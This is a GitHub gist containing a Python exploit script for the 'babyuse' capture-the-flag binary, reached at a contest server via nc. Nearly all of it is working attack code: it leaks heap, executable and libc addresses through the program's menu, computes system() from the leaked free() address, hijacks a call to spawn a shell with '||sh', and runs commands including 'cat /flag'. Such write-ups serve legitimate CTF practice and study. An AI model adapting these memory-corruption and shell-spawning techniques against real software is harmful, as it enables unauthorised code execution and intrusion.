Created
April 17, 2017 09:07
GitHub flags this file as containing bidirectional Unicode text that may be interpreted or compiled differently than what appears below. Treat that as a review finding rather than cosmetics: right-to-left override characters can make the rendered source differ from what the interpreter actually executes (the "Trojan Source" class of issue), so open the file in an editor that reveals hidden Unicode characters, or inspect it with a hex viewer, before running it against anything.
Learn more about bidirectional Unicode characters
import shlex
import struct
import subprocess
import time

from secret import TOKEN
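# Target selection: the contest server (remote) or the local binary for
# debugging. Both are driven through the same stdin/stdout pipe pair.
remote = True
if remote:
    cmd = 'nc 202.112.51.247 3456'
else:
    cmd = './babyuse'

# shell=False so that Popen owns nc / babyuse directly: with shell=True the
# pid is an intermediate /bin/sh, and the p.kill() at the end of the script
# may leave the real target running. `cmd` stays a readable string and is
# tokenised with shlex.
p = subprocess.Popen(
    shlex.split(cmd),
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    shell=False,
)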
def send(s):
    """Write the raw bytes `s` to the target's stdin and flush at once.

    Every write is echoed to stdout as a repr so a failed run can be
    replayed step by step against the menu.
    """
    print("SEND: %s" % repr(s))
    stdin = p.stdin
    stdin.write(s)
    stdin.flush()
def recv():
    """Read one line of bytes from the target's stdout and log it.

    Returns b"" once the pipe is at EOF, and keeps returning b"" on every
    later call, so loops that wait for a particular line must treat an
    empty result as "the target is gone".
    """
    stdout = p.stdout
    line = stdout.readline()
    print("RECV: %s" % repr(line))
    return line
def unpack(s):
    """Decode exactly 4 bytes `s` as a little-endian unsigned 32-bit int.

    The rest of the script slices leaked addresses to 4 bytes before
    calling this; struct.error is raised for any other length.
    """
    (value,) = struct.unpack('<I', s)
    return value
def pack(x):
    """Encode the int `x` as 4 little-endian bytes (inverse of unpack).

    struct.error is raised when `x` does not fit in an unsigned 32-bit int.
    """
    fmt = '<I'
    return struct.pack(fmt, x)
def echo(s):
    """Send `s` as one input line, i.e. the bytes followed by a newline."""
    line = s + b'\n'
    send(line)
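def leak_heap():
    """Walk the menu so the program prints a heap pointer, and return it.

    The answers are replayed verbatim from the original exploit; what each
    one selects depends on the babyuse menu, which is not visible here.
    The caller subtracts `heap_gdb` from the result to get the heap slide
    that every later stage adds to its hard-coded 0x5655xxxx addresses.

    Returns:
        The 4-byte little-endian value found in the third space-separated
        field of the "Select gun" line, as an int.

    Raises:
        EOFError: the target closed stdout before printing "Select gun"
            (e.g. it crashed). readline() returns b"" forever at EOF, so
            without this check the wait loop would spin indefinitely.
        ValueError: fewer than 4 bytes were recovered. A leaked byte of
            0x0a terminates the line early and 0x20 shifts the space
            split, so the parse is not robust to every address; re-run
            the exploit in that case.
    """
    answers = (
        b"1", b"1", b"30", b"hog",
        b"1", b"1", b"15", b"01234",
        b"2", b"1",
        b"6", b"0",
        b"6", b"1",
        b"5", b"4",
    )
    for answer in answers:
        echo(answer)

    while True:
        line = recv()
        if not line:
            raise EOFError("target closed the pipe before leaking a heap address")
        if b'Select gun' in line:
            raw = line.split(b' ')[2][:4]
            if len(raw) != 4:
                raise ValueError(
                    "short heap leak %r: a 0x0a/0x20 byte broke the parse, rerun" % (raw,))
            addr = unpack(raw)
            print("%x" % addr)
            break

    # Consume the menu that follows: reads at least one line and stops at
    # the first one that does not contain "7. Exit".
    while b'7. Exit' in recv():
        pass
    return addr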
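def leak_exe(heap_offset):
    """Leak a pointer into the executable image and return it as an int.

    Args:
        heap_offset: slide between the live heap and the gdb session the
            hard-coded 0x5655xxxx addresses were taken from
            (`heap_current - heap_gdb` in the caller).

    Returns:
        The value printed on the "Select gun" line. Per the original
        comment it is `binary_base + 0x1d30`; the caller subtracts 0x1d30
        to recover the image base.

    Raises:
        EOFError: the target closed stdout before printing "Select gun";
            readline() would otherwise return b"" forever and hang the loop.
        ValueError: fewer than 4 bytes were recovered (a leaked 0x0a ends
            the line, a leaked 0x20 shifts the split); re-run.
    """
    answers = (
        b"1", b"1", b"15", b"01234",
        b"1", b"1", b"15", b"01234",
        b"6", b"1",
        b"4", b"0", b"15",
    )
    for answer in answers:
        echo(answer)

    # Four filler bytes, then the heap address to read, adjusted by the
    # slide so it matches the live process rather than the gdb session.
    target = 0x5655ea50 + heap_offset
    echo(b'AAAA' + pack(target))
    echo(b'5')  # this leaks binary_base + 0x1d30
    echo(b'4')

    while True:
        line = recv()
        if not line:
            raise EOFError("target closed the pipe before leaking an exe address")
        if b'Select gun' in line:
            raw = line.split(b' ')[2][:4]
            if len(raw) != 4:
                raise ValueError(
                    "short exe leak %r: a 0x0a/0x20 byte broke the parse, rerun" % (raw,))
            addr = unpack(raw)
            print("%x" % addr)
            break

    # Consume the trailing menu; stops at the first line without "7. Exit".
    while b'7. Exit' in recv():
        pass
    return addr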
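def leak_libc(exe_base):
    """Leak the address of free() in the target's libc and return it.

    Args:
        exe_base: image base of the executable, as computed by the caller
            from leak_exe().

    Returns:
        The value printed on the "Select gun" line. The original comment
        says this is free@libc, read from the slot at `exe_base + 0x3fd0`
        (presumably free's GOT entry -- confirm against the binary).
        The caller turns it into system()'s address with the
        free/system offsets of the matching libc.

    Raises:
        EOFError: the target closed stdout before printing "Select gun";
            readline() would otherwise return b"" forever and hang the loop.
        ValueError: fewer than 4 bytes were recovered (a leaked 0x0a ends
            the line, a leaked 0x20 shifts the split); re-run.
    """
    answers = (
        b"1", b"1", b"15", b"01234",
        b"6", b"1",
        b"4", b"0", b"15",
    )
    for answer in answers:
        echo(answer)

    # Four filler bytes, then the address inside the executable to read.
    echo(b"AAAA" + pack(0x3fd0 + exe_base))
    echo(b'5')  # this leaks free@libc
    echo(b'4')

    while True:
        line = recv()
        if not line:
            raise EOFError("target closed the pipe before leaking a libc address")
        if b'Select gun' in line:
            raw = line.split(b' ')[2][:4]
            if len(raw) != 4:
                raise ValueError(
                    "short libc leak %r: a 0x0a/0x20 byte broke the parse, rerun" % (raw,))
            addr = unpack(raw)
            print("%x" % addr)
            break

    # Consume the trailing menu; stops at the first line without "7. Exit".
    while b'7. Exit' in recv():
        pass
    return addr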
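def shell(heap_offset, system_libc):
    """Final stage: get system() invoked on a string ending in "||sh", then
    run a few commands through the resulting shell.

    Args:
        heap_offset: heap slide (see leak_heap() and the caller).
        system_libc: absolute address of system() in the target's libc,
            derived by the caller from the leaked free() address and the
            free/system offsets of the matching libc build.

    The menu walk is replayed from the original exploit. One of the
    inputs is the packed system() address; the last payload is
    `pack(addr) * 2 + b"||sh"`. When the bytes before "||" are not a
    runnable command, the shell's "||" falls through to "sh", which is
    what yields the interactive shell regardless of what the leading
    pointer bytes decode to. After a "Select gun" line is seen (or 80
    lines have passed) the function sleeps one second, sends
    pwd / ls / cat /flag / exit, then walks the menu to the exit entry
    and drains the pipe so every last line is logged.

    Raises:
        EOFError: the target closed the pipe while waiting for the shell
            stage (e.g. the hijacked call crashed); reported explicitly
            instead of sleeping and then writing into a dead pipe.
    """
    for answer in (b"1", b"1", b"15", b"01234", b"1", b"1", b"15"):
        echo(answer)
    echo(pack(system_libc))
    for answer in (b"6", b"1", b"4", b"0", b"15"):
        echo(answer)

    addr = heap_offset + 0x5655eab0
    print("addr = %x" % addr)
    echo(pack(addr) * 2 + b'||sh')
    echo(b'5')
    echo(b'1')

    # Bounded wait: the original gives up looking after 80 lines and
    # proceeds anyway, so a missing prompt is not fatal -- only EOF is.
    for _ in range(80):
        line = recv()
        if not line:
            raise EOFError("target closed the pipe before the shell stage")
        if b'Select gun' in line:
            break

    time.sleep(1)  # give sh a moment to start before typing into it
    for command in (b'pwd', b'ls /', b'cat /flag', b'exit'):
        echo(command)
    echo(b'4')
    echo(b'7')

    # Drain until EOF so all remaining output goes through recv()'s log.
    while len(recv()) > 0:
        pass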
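# --- main exploit flow ---------------------------------------------------
if remote:
    # Team token from secret.py (not part of this gist); echo() appends
    # b'\n', so it is expected to be bytes.
    echo(TOKEN)

# Heap address observed under gdb for the same menu walk. The difference
# between the live leak and this value is the slide added to every
# hard-coded 0x5655xxxx heap address in the stages above.
heap_gdb = 0x5655ea08

# Offsets of free() and system() inside libc. Only their difference is
# used, but it must come from the exact libc build the target runs:
# the remote pair differs from the local one, and a mismatched libc
# turns the computed system() address into a crash.
if remote:
    free_relative = 0x000712f0
    system_relative = 0x0003ada0
else:
    free_relative = 0x705b0
    system_relative = 0x3a940

# Kill the child even if a stage raises, so a failed attempt does not
# leave an nc / babyuse process hanging around.
try:
    heap_current = leak_heap()
    heap_offset = heap_current - heap_gdb
    print("offset = %x" % heap_offset)
    exe_current = leak_exe(heap_offset)
    exe_base = exe_current - 0x1d30
    # Original printed ("exe_base = %s", exe_base), i.e. a literal "%s"
    # followed by the decimal value; format it as hex like the others.
    print("exe_base = %x" % exe_base)
    free_libc = leak_libc(exe_base)
    system_libc = free_libc + system_relative - free_relative
    print("system_libc = %x" % system_libc)
    shell(heap_offset, system_libc)
finally:
    p.kill()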